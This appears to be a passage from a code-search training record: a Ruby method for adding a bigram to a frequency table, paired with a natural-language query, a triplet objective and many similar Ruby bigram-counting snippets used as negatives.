"0.50454265",
"0.5039163",
"0.50371987",
"0.5030881",
"0.5020534",
"0.5019033",
"0.50075096",
"0.5005305",
"0.500367",
"0.49991918",
"0.49871945",
"0.4977321",
"0.49726316",
"0.49726316",
"0.49726316",
"0.49673173",
"0.49647567",
"0.4952888",
"0.49475464",
"0.49436304",
"0.49426013",
"0.49423176",
"0.4936403",
"0.4934934",
"0.49338287",
"0.49253032",
"0.49245858",
"0.4923282",
"0.49215913",
"0.49201706",
"0.49153033",
"0.4910416",
"0.4910293",
"0.49046507"
] | 0.0 | -1 |
Add a bigram to the table. If it is already present just count the additional file that contatins it. | def add(word1, word2, file=nil)
key = [word1,word2]
if @table.key?(key)
@table[key].file!(file) if file
else
bigram = Bigram.new(word1, word2)
@table[key] = bigram
@table[key].file!(file)
@index[word1] << word2
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def add(word1, word2, file)\n if table.key?([word1, word2])\n bigram = table[[word1,word2]]\n else\n bigram = Bigram.new(word1, word2)\n @table[[word1,word2]] = bigram\n @index[word1][word2] = bigram\n end\n bigram.found_in_file(file)\n end",
"def tally!(file_count)\n @table.each do |words, bigram|\n bigram.tally!(table.size, file_count)\n end\n end",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def process_file(file_name)\r\n\tputs \"Processing File.... \"\r\n\r\n\tbegin\r\n\t\tcounter = Hash.new\r\n\t\tfile = File.open(file_name)\r\n\t\tuntil file.eof?\r\n\t\t\tfile.each_line do |line|\r\n\t\t\t\t# do something for each line\r\n\t\t\t\ttitle = cleanup_title(line)\r\n\t\t\t\tunless(title == \"\")\r\n\t\t\t\t\tbigram = title.split().each_cons(2).to_a\r\n\t\t\t\t\tbigram = bigram.map{ |n| n.join(' ')}\r\n\t\t\t\t\tbigram = bigram.each_with_object(Hash.new(0)){|word, obj| obj[word] += 1}\r\n\t\t\t\t\tif bigram.any?\r\n\t\t\t\t\t\tcounter.merge!(bigram) { |k, old, new| old + new}\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\t\tfile.close\r\n\r\n\t\t$bigramsArray = counter.sort_by { |k, v| -v }\r\n\t\tcreate_hash()\r\n\t\t#$bigrams = $bigrams.to_h\r\n\r\n\t\t#$bigramsHash = Hash.new\r\n\t\t#$bigramsHash = $bigrams.to_h\r\n \t#$bigrams.each { |k, v| puts \"#{v} => #{k}\"}\r\n\r\n\r\n\t\tputs \"Finished. Bigram model built.\\n\"\r\n\trescue\r\n\t\tSTDERR.puts \"Could not open file\"\r\n\t\texit 4\r\n\tend\r\n\r\nend",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def add(gbfile)\n compress = false\n if (gbfile.index(\".gz\"))\n system(\"PATH=/usr/bin;zcat #{gbfile} > #{gbfile}.tmp\")\n gbfile = gbfile + \".tmp\"\n compress = true\n end\n FlatFile.new(GenBank, File.new(gbfile)).each {|seq|\n seq.each_cds {|cds|\n @product[cds.assoc[\"protein_id\"]] = cds.assoc[\"product\"]\n @role[cds.assoc[\"protein_id\"]] = cds.assoc[\"note\"].split(\";\")\n }\n }\n File.unlink(gbfile) if compress\n end",
"def add_word(word)\n word_hash = Digest::SHA1.hexdigest(word)\n word_file_path = ROOT_DATA_FOLDER + word_hash\n word_file = File.open(word_file_path, 'a+')\n words = word_file.readlines\n words.each {|word| word.sub! \"\\n\", ''} # remove trailing \\n\n word_index = words.index(word)\n\n if word_index.nil? # add new word to end of file with count = 1\n add_line_to_file(word_file_path, word)\n add_line_to_file(word_file_path, '1')\n else # add count to existing word by replacing count line in file\n word_count = words[word_index + 1].to_i\n add_line_to_file(word_file_path, (word_count + 1).to_s, word_index + 1)\n end\n word_file.close\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# call cleanup_title method to extract song titles\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\t#ignore titles with non-english characters\n\t\t\tif title[/(\\w|\\s|\\')*/] == title\n\t\t\t\ttitle = title.split\n\t\t\t\ti = 0;\n\n\t\t\t\twhile i <= title.size-1 #loop through array of words\n\t\t\t\t\thasKey = $bigrams[title[i]] #first word\n\t\t\t\t\thasChild = $bigrams[title[i]] && $bigrams[title[i]][title[i+1]] #second word that follows first\n\t\t\t\t\tbreak if title[i+1].nil? #break if this is the last word in the array\n\n\t\t\t\t\tif hasChild #if child of primary key exists, add one to the count\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] += 1;\n\t\t\t\t\telsif hasKey #if primary key exists, add new child with initial count = 1\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] = 1;\n\t\t\t\t\telse #if primary key does not exist, add it and child key\n\t\t\t\t\t\t$bigrams[title[i]] = {title[i+1] => 1};\n\t\t\t\t\tend\n\t\t\t\t\ti += 1;\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\t end\nend",
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tall = Hash.new\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\ttitle = cleanup_title(line)\n\t\t\tunless title.nil?\n\t\t\t\tgram = title.split().each_cons(2).to_a\n\t\t\t\tgram = gram.map{ |n| n.join(' ') }\n \t\t\t\tgram = gram.each_with_object(Hash.new(0)) { |word, obj| obj[word] += 1 }\n \t\t\t\tif gram.any?\n\t \t\t\t\tall.merge!(gram) { |k, old, new| old + new }\n\t \t\t\tend\n\t\t\tend\n\t\tend\n\t\t$bigramsArray = all.sort_by { |k, v| -v }\n\t\tcreate_hash()\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def load_bigrams(filename)\n #puts filename\n CSV.foreach(filename, :headers=>true) do |row|\n bigram = row['bigram']\n bigram.gsub!(' ','_')\n @bigrams << bigram\n end\n end",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def add(word)\n word.scan(/./) {|l| @hist[l] = @hist[l] + 1 if ('a'..'z') === l}\n @total_letters += word.size\n end",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def each\n\t\t @table.each do |pair, bigram|\n yield(bigram)\n\t\t end\n\t\t end",
"def add_table(table_name)\n space_file = \"%s/%s.ibd\" % [config[:data_directory], table_name]\n if File.exist?(space_file)\n add_space_file(space_file)\n else\n add_space_orphan(table_name)\n end\n end",
"def dump_bigram_info_from_hash()\n\n cumulative_bigram_count = 0\n\n $bigram_count.keys.sort.each do |bigram|\n local_lead_word = bigram.split(/\\s/)[0] #shouldn't need to extract this each time\n cumulative_bigram_count += $bigram_count[bigram]\n cumulative_proportion = cumulative_bigram_count.to_f / $lead_word_count[local_lead_word].to_f\n puts sprintf(\"%s\\t%f\", bigram, cumulative_proportion )\n end\n\nend",
"def tally!(file_count)\n table.each do |spelling, word|\n word.tally!(table.size, file_count)\n end\n end",
